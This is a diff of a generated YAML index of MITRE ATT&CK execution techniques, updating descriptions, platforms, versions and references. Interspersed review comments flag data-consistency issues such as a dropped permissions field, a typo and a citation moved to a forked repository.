- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.002
atomic_tests: []
T1106:
technique:
- modified: '2023-10-13T16:01:07.538Z'
+ modified: '2024-09-12T15:25:57.058Z'
name: Native API
description: |-
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -25237,9 +25552,9 @@ execution:
2021.
url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
- source_name: Microsoft Win32
description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
March 15, 2020.
@@ -25256,19 +25571,18 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1106
atomic_tests: []
T1059.010:
technique:
- modified: '2024-04-10T16:05:22.456Z'
+ modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
- These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+ These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
@@ -25277,7 +25591,7 @@ execution:
- Liran Ravich, CardinalOps
- Serhii Melnyk, Trustwave SpiderLabs
- Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
- - Monty
+ - "@_montysecurity"
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -25314,11 +25628,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:44:20.143Z'
name: Cloud API
description: "Adversaries may abuse cloud APIs to execute malicious commands.
APIs available in cloud environments provide various functionalities and are
@@ -25355,11 +25668,10 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
x_mitre_remote_support: false
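Review bot: the platform list for T1059.009 changes from `Azure AD`, `Office 365` and `Google Workspace` to `Office Suite` and `Identity Provider` (with the version bump to `'1.1'`), following ATT&CK's platform consolidation. Any per-platform index files or filters keyed on the old platform names need to be regenerated or retired in the same change; otherwise the cloud API technique drops out of those indexes while the stale old-name indexes keep being published.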
@@ -25378,13 +25690,12 @@ execution:
url: https://github.com/Azure/azure-powershell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -25463,12 +25774,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1059:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Command and Scripting Interpreter
description: |-
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -25479,6 +25789,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: |-
Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -25489,16 +25800,16 @@ execution:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- - Office 365
- - Azure AD
- IaaS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Script: Script Execution'
- 'Process: Process Creation'
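Review bot: T1059 ends up with `x_mitre_attack_spec_version` placed directly after `kill_chain_phases` and `x_mitre_modified_by_ref` after `x_mitre_is_subtechnique`, whereas every other object in this change keeps both keys at the end after `object_marking_refs` (the old copies at the end of this object are removed in the next hunk). The content is identical, but the different key placement suggests this object went through a different code path in the generator; emitting one key order for all objects keeps future diffs minimal.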
@@ -25529,14 +25840,11 @@ execution:
url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059
atomic_tests: []
T1609:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:25:45.507Z'
name: Kubernetes Exec Into Container
description: |-
Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -25602,39 +25910,13 @@ execution:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1609
atomic_tests: []
T1569.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
- type: attack-pattern
- created: '2020-03-10T18:26:56.187Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569.001
- url: https://attack.mitre.org/techniques/T1569/001
- - source_name: Launchctl Man
- url: https://ss64.com/osx/launchctl.html
- description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
- - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
- description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
- Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
- source_name: Sofacy Komplex Trojan
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-20T20:14:35.179Z'
name: 'System Services: Launchctl'
description: |
Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -25643,6 +25925,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
plist file on disk which can be monitored. Monitor for recently modified or
created plist files with a significant change to the executable path executed
@@ -25655,19 +25938,42 @@ execution:
are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
the services are unloaded prior to deleting plist files."
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- 'Service: Service Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+ created: '2020-03-10T18:26:56.187Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569/001
+ external_id: T1569.001
+ - source_name: Sofacy Komplex Trojan
+ description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+ Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+ url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ - source_name: Launchctl Man
+ description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+ url: https://ss64.com/osx/launchctl.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1569.001
atomic_tests: []
T1059.008:
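Review bot: `x_mitre_permissions_required` (User, root) is removed from T1569.001 in this hunk and not re-added, which is a real content change buried inside what is otherwise a reorder (the same field disappears from T1559 later in this diff). ATT&CK retired that field, so dropping it is correct, but check that nothing in the index tooling still reads it: a column or filter built from required permissions would silently go empty. The reordered `external_references` (`Launchctl Man` moves from first to last) is presentation only and does not need a commit-message mention; the dropped permissions field does.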
@@ -25710,7 +26016,7 @@ execution:
data, modify startup configuration parameters to load malicious system software,
or to disable security features or logging to avoid detection.(Citation: Cisco
Synful Knock Evolution)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T20:28:09.848Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Device CLI
x_mitre_detection: |-
@@ -25726,72 +26032,75 @@ execution:
x_mitre_remote_support: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1559.003:
technique:
- x_mitre_platforms:
- - macOS
+ modified: '2024-10-16T16:14:12.793Z'
+ name: XPC Services
+ description: |-
+ Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+ Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_contributors:
+ - Csaba Fitzl @theevilbit of Kandji
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Csaba Fitzl @theevilbit of Offensive Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ x_mitre_remote_support: false
type: attack-pattern
id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
created: '2021-10-12T06:45:36.763Z'
- x_mitre_version: '1.0'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1559.003
url: https://attack.mitre.org/techniques/T1559/003
+ external_id: T1559.003
- source_name: creatingXPCservices
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
description: Apple. (2016, September 9). Creating XPC Services. Retrieved
April 19, 2022.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
- source_name: Designing Daemons Apple Dev
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
description: Apple. (n.d.). Retrieved October 12, 2021.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
- source_name: CVMServer Vuln
- url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
in macOS and iOS. Retrieved October 12, 2021.'
+ url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
- source_name: Learn XPC Exploitation
- url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
October 12, 2021.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
- Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XPC Services
- x_mitre_detection: ''
- kill_chain_phases:
- - phase_name: execution
- kill_chain_name: mitre-attack
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Process: Process Access'
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204:
technique:
- modified: '2024-04-12T03:46:49.507Z'
+ modified: '2024-11-11T18:52:12.103Z'
name: User Execution
description: |-
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
- Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ Adversaries may also deceive users into performing actions such as:
+
+ * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+ * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+ * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
kill_chain_phases:
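Review bot: the added T1204 bullet `Coerceing users to copy, paste, and execute malicious code manually` carries a typo (`Coerceing` should be `Coercing`); since this text is ingested from the upstream ATT&CK description it belongs in an upstream fix rather than a hand edit of the generated file, but it is worth raising there. Two other points in this hunk: the T1559.003 contributor credit changes affiliation from `Csaba Fitzl @theevilbit of Offensive Security` to `Csaba Fitzl @theevilbit of Kandji`, which is a data change rather than a reorder and should be called out in the commit message; and the XPC description is broken mid-sentence across `using the low-level XPC Service C API` / `or the high level NSXPCConnection API` / `in order to handle tasks`, the same pattern seen in the PowerShell description (`Start-Process` / `cmdlet`), which looks like inline markup being replaced by line breaks on ingest and is worth checking in the generator.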
@@ -25799,7 +26108,11 @@ execution:
phase_name: execution
x_mitre_contributors:
- Oleg Skulkin, Group-IB
- - Goldstein Menachem
+ - Menachem Goldstein
+ - Harikrishnan Muthu, Cyble
+ - ReliaQuest
+ - Ale Houspanossian
+ - Fernando Bacchin
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -25814,7 +26127,7 @@ execution:
- macOS
- IaaS
- Containers
- x_mitre_version: '1.6'
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Instance: Instance Start'
- 'File: File Creation'
@@ -25841,6 +26154,10 @@ execution:
description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
Bookmarks. Retrieved January 2, 2024.
url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+ - source_name: Reliaquest-execution
+ description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+ Campaign. Retrieved August 2, 2024.
+ url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
- source_name: Telephone Attack Delivery
description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
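Review bot: the new `Reliaquest-execution` reference spells the vendor `Reliaquest` in both `source_name` and `description`, while the contributor credited in the same object is `ReliaQuest`. The `source_name` has to stay as is because it must match the `(Citation: Reliaquest-execution)` marker in the description, but the author string inside `description` could use the vendor's own capitalization for consistency with the contributors list.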
@@ -25851,15 +26168,19 @@ execution:
API forms and more to scam users in popular online game “Roblox”. Retrieved
January 2, 2024.
url: https://blog.talosintelligence.com/roblox-scam-overview/
+ - source_name: proofpoint-selfpwn
+ description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+ From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+ 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -25876,7 +26197,7 @@ execution:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -25924,7 +26245,7 @@ execution:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -25957,12 +26278,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1059.001:
technique:
- modified: '2024-03-01T18:01:37.575Z'
+ modified: '2024-10-15T16:39:13.228Z'
name: 'Command and Scripting Interpreter: PowerShell'
description: |-
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process
cmdlet which can be used to run an executable and the Invoke-Command
cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -26023,8 +26343,9 @@ execution:
POWERSHELL LOGGING. Retrieved February 16, 2016.
url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
- source_name: Github PSAttack
- description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
- url: https://github.com/jaredhaight/PSAttack
+ description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+ 2024.
+ url: https://github.com/Exploit-install/PSAttack-1
- source_name: inv_ps_attacks
description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
Retrieved December 1, 2021.
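Review bot: the `Github PSAttack` reference URL changes from the original author's repository (`https://github.com/jaredhaight/PSAttack`) to `https://github.com/Exploit-install/PSAttack-1`, which is a third-party copy under an unrelated account. A citation in a threat-knowledge index should point at the canonical source or an archived snapshot of it, not at a fork: a fork can be altered or deleted at any time, and a reader following the link has no way to confirm its content matches what was cited. If the original repository is no longer reachable (the updated retrieved date suggests it was re-checked), an archive.org capture of the original URL would be the safer reference.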
@@ -26046,12 +26367,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.001
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -26129,14 +26449,13 @@ execution:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1059.004:
technique:
- modified: '2024-04-16T12:24:40.163Z'
+ modified: '2024-10-15T15:17:19.136Z'
name: 'Command and Scripting Interpreter: Bash'
description: |-
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -26194,36 +26513,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.004
atomic_tests: []
T1559:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
- type: attack-pattern
- created: '2020-02-12T14:08:48.689Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1559
- url: https://attack.mitre.org/techniques/T1559
- - source_name: Linux IPC
- url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
- description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
- March 11, 2022.
- - source_name: Fireeye Hunting COM June 2019
- url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
- description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
- 10, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-10T19:06:35.666Z'
name: Inter-Process Communication
description: "Adversaries may abuse inter-process communication (IPC) mechanisms
for local code or command execution. IPC is typically used by processes to
@@ -26244,25 +26538,110 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
or spawned processes that are associated with abuse of IPC mechanisms.
- x_mitre_version: '1.2'
